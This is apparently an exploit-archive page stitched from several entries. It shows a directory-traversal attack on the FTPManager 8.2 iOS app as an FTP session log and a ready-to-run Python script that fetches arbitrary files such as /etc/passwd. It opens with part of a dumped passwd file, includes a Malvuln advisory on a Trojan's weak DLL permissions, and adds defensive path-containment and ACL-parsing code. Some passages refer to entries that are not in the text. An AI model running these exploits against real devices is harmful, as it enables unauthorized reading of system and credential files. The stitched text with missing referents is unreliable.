Daemon:/var/db/darwindaemon:/usr/bin/false<br />_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false<br /><br /><br /><br />---------------------------------------------------<br /><br /># Exploit Title: FTPManager 8.2 Directory Traversal (ftp)<br /># Date: Sep 6, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.skyjos.com/<br /># Software Link:<br />https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186<br /># Version: 8.2<br /># Tested on: ios 15.6<br /><br /><br />#ftp 192.168.1.178 2121<br />Connected to 192.168.1.178.<br />220 ---------- Welcome to FTPManager ----------<br />Name (192.168.1.178:chokri):<br />230 User chokri logged in.<br />Remote system type is UNIX.<br />Using binary mode to transfer files.<br />ftp> cd /../../../../../../../../../../../../../../../../<br />250 OK. Current directory is<br />/../../../../../../../../../../../../../../../../<br />ftp> ls<br />200 PORT command successful.<br />150 Accepted data connection<br />total 10<br />drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr<br />drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin<br />drwxr-xr-x 0 root wheel 576 Jan 01 1970 sbin<br />drwxr-xr-x 0 root wheel 160 Jan 01 1970 System<br />drwxr-xr-x 0 root wheel 672 Jan 01 1970 Library<br />drwxr-xr-x 0 root wheel 224 Jan 01 1970 private<br />drwxr-xr-x 0 root wheel 1132 Jan 01 1970 dev<br />drwxr-xr-x 0 root admin 3968 Jan 01 1970 Applications<br />drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer<br />drwxr-xr-x 0 root admin 64 Jan 01 1970 cores<br />WARNING! 10 bare linefeeds received in ASCII mode<br />File may not have transferred correctly.<br />226 Transfer complete.<br />ftp> cd private/etc<br />250 OK. 
Current directory is<br />/../../../../../../../../../../../../../../../../private/etc<br />ftp> get passwd<br />local: passwd remote: passwd<br />200 PORT command successful.<br />150 Opening BINARY mode data connection for 'passwd'.<br />226 Transfer complete.<br />2581 bytes received in 0.00 secs (11.5020 MB/s)<br />ftp> get services<br />local: services remote: services<br />200 PORT command successful.<br />150 Opening BINARY mode data connection for 'services'.<br />226 Transfer complete.<br />677977 bytes received in 0.17 secs (3.8257 MB/s)<br /><br /><br /><br />---------------------------------------------------<br /><br /><br /><br /><br /># Exploit Title: FTPManager 8.2 Local File inclusion (ftp) python<br /># Date: Sep 6, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.skyjos.com/<br /># Software Link: https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186<br /># Version: 8.2<br /># Tested on: ios 15.6<br /><br /><br />from ftplib import FTP<br />import argparse<br /><br />help = " FTPManager 8.2 Local File inclusion by chokri hammedi"<br />parser = argparse.ArgumentParser(description=help)<br />parser.add_argument("--target", help="Target IP", required=True)<br />parser.add_argument("--file", help="File To Open eg: etc/passwd", required=True)<br /><br />args = parser.parse_args()<br /><br /><br />ip = args.target<br />port = 2121  # Default Port<br />files = args.file<br /><br /><br />ftpConnection = FTP()<br />ftpConnection.connect(host=ip, port=port)<br />ftpConnection.login()  # no credentials: ftplib logs in as anonymous<br /><br />def downloadFile():<br />    # Step above the served directory, then fetch the requested path<br />    ftpConnection.cwd('/../../../../../../../../../../../../../../../../')<br />    with open('data.txt', 'wb') as out:<br />        ftpConnection.retrbinary(f"RETR {files}", out.write)<br />    ftpConnection.close()<br />    with open('data.txt', 'r') as file:<br />        print(f"[***] The contents of {files}\n")<br />        print(file.read())<br /><br />downloadFile()<br /></code></pre>
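The FE File Explorer and FTPManager entries above are the same bug seen over HTTP and over FTP: a client-supplied path is joined to the served directory and the result is never checked to still lie inside it. As an added example, not code from either app, this is the containment check a file-serving component should apply; it treats leading slashes as relative to the served root (FTP semantics), collapses `..`, follows symlinks, and is exercised against a constructed temporary share so it runs stand-alone.

```python
import tempfile
from pathlib import Path


class PathTraversalError(ValueError):
    """Raised when a client-supplied path would leave the served directory."""


def resolve_within_root(root, requested):
    """Map a client-supplied path onto `root`, refusing anything that escapes it.

    Leading slashes are treated as relative to the served root (the FTP
    convention), '..' components are collapsed, and symlinks are followed by
    resolve(), so a link that points outside the root is rejected as well.
    """
    root = Path(root).resolve()
    # "/etc/passwd" is taken to mean "<root>/etc/passwd", never the real /etc.
    candidate = (root / requested.lstrip("/\\")).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        raise PathTraversalError(f"{requested!r} escapes the served root") from None
    return candidate


def check_requests(root, requests):
    """Return {request: 'ok' | 'rejected'} for a batch of client paths."""
    verdicts = {}
    for req in requests:
        try:
            resolve_within_root(root, req)
            verdicts[req] = "ok"
        except PathTraversalError:
            verdicts[req] = "rejected"
    return verdicts


def demo_root():
    """Create a small constructed share directory to exercise the check."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    (root / "docs").mkdir()
    (root / "docs" / "readme.txt").write_text("hello")
    return root


# Constructed client requests: the first three are legitimate ways of naming
# docs/readme.txt, the rest are the escape attempts the advisories describe.
SAMPLE_REQUESTS = [
    "docs/readme.txt",
    "/docs/readme.txt",
    "docs/../docs/readme.txt",
    "/../../../../../../../../../../../../../../../../etc/passwd",
    "../private/etc/passwd",
    "docs/../../secret",
]

if __name__ == "__main__":
    for req, verdict in check_requests(demo_root(), SAMPLE_REQUESTS).items():
        print(f"{verdict:8} {req}")
```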
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/d871836f77076eeed87eb0078c1911c7.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Autoit.fhj<br />Vulnerability: Insecure Permissions<br />Description: The malware writes two hidden DLL files "vp8decoder.dll" and "vp8encoder.dll" to its installation directory, granting full (F) permissions to the Everyone user group. Any user can replace the PE files dropped by the malware to disable it, or swap in their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Family: Autoit<br />Type: PE32<br />MD5: d871836f77076eeed87eb0078c1911c7<br />Vuln ID: MVID-2022-0637<br />Disclosure: 09/06/2022<br /><br />Exploit/PoC:<br />Insecure directory permissions on two DLLs, alongside a number of hidden files<br /><br />C:\Program Files (x86)\XPS Rasterization Service Component>attrib -s -h *<br />C:\Program Files (x86)\XPS Rasterization Service Component>cacls *<br />C:\Program Files (x86)\XPS Rasterization Service Component\vp8decoder.dll Everyone:F<br />C:\Program Files (x86)\XPS Rasterization Service Component\vp8encoder.dll Everyone:F<br /><br /><br />Directory of C:\Program Files (x86)\XPS Rasterization Service Component<br /><br />09/05/2022 12:18 AM 1,165 Log(05.09.2022).txt<br />09/05/2022 12:15 AM 803,971 Screen(00_15).jpg<br />02/21/2017 02:58 PM 2,665 settings.dat<br />07/15/2015 12:19 PM 143,568 vp8decoder.dll<br />07/15/2015 12:19 PM 539,856 vp8encoder.dll<br />09/05/2022 12:15 AM 2,052,816 xps.exe<br />02/21/2017 01:24 PM 2,031,104 xservice.exe<br /> 7 File(s) 5,575,145 bytes<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
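The `cacls` listings in the Pophot and Autoit entries above share one format: a path followed by `TRUSTEE:(flags)PERM`, with indented continuation lines for further trustees. As an added example (not from either advisory), the following parses that format and flags entries that give broadly-held groups (Everyone, Authenticated Users, Users) write-capable rights (W, C or F), which is exactly the condition both advisories describe. The sample listing is constructed from the values the advisories quote; the handling of trustee names with spaces is a heuristic, since `cacls` output separates path and trustee with a single space.

```python
import re

# Groups that effectively mean "any local user" on a typical Windows host.
BROAD_GROUPS = {"Everyone", "NT AUTHORITY\\Authenticated Users",
                "BUILTIN\\Users", "NT AUTHORITY\\INTERACTIVE"}
# cacls permission letters that allow modifying the object (W write, C change, F full).
WRITE_PERMS = {"W", "C", "F"}

ACE_TAIL = r":(?P<flags>(?:\([A-Z]+\))*)(?P<perm>[NRWCF])\s*$"
# Well-known trustees whose names contain spaces are matched explicitly;
# otherwise "NT AUTHORITY\..." cannot be told apart from a path ending in "NT".
KNOWN_TRUSTEE = re.compile(
    r"\s(?P<trustee>(?:NT AUTHORITY|NT SERVICE|BUILTIN)\\[^:\\]+|Everyone|CREATOR OWNER)"
    + ACE_TAIL)
# Generic DOMAIN\Name trustee: the greedy path keeps every space it can.
GENERIC_TRUSTEE = re.compile(
    r"^(?P<path>.*\S)\s+(?P<trustee>[^\s\\:]+\\[^:\\]+?)" + ACE_TAIL)
CONTINUATION = re.compile(r"^(?P<trustee>[^:]+?)" + ACE_TAIL)


def parse_cacls(listing):
    """Parse cacls output into a list of (path, trustee, flags, perm) tuples."""
    entries, path = [], None
    for raw in listing.splitlines():
        if not raw.strip():
            continue
        if raw[0].isspace():          # continuation: another ACE for `path`
            m = CONTINUATION.match(raw.strip())
            if m and path:
                entries.append((path, m["trustee"], m["flags"], m["perm"]))
            continue
        m = KNOWN_TRUSTEE.search(raw)
        if m:
            path = raw[:m.start()].rstrip()
        else:
            m = GENERIC_TRUSTEE.match(raw)
            if not m:
                continue              # not an ACL line (e.g. a command echo)
            path = m["path"]
        entries.append((path, m["trustee"], m["flags"], m["perm"]))
    return entries


def weak_entries(listing):
    """Entries granting a broad group write-capable rights, as (path, trustee, perm)."""
    return [(p, t, perm) for p, t, _flags, perm in parse_cacls(listing)
            if t in BROAD_GROUPS and perm in WRITE_PERMS]


# Constructed listing built from the values the two advisories quote.
SAMPLE_CACLS = r"""
C:\zhqbdf.bat BUILTIN\Administrators:(ID)F
              NT AUTHORITY\SYSTEM:(ID)F
              BUILTIN\Users:(ID)R
              NT AUTHORITY\Authenticated Users:(ID)C

C:\Program Files (x86)\XPS Rasterization Service Component\vp8decoder.dll Everyone:F
C:\Program Files (x86)\XPS Rasterization Service Component\vp8encoder.dll Everyone:F
"""

if __name__ == "__main__":
    for path, trustee, perm in weak_entries(SAMPLE_CACLS):
        print(f"WEAK {perm} for {trustee} on {path}")
```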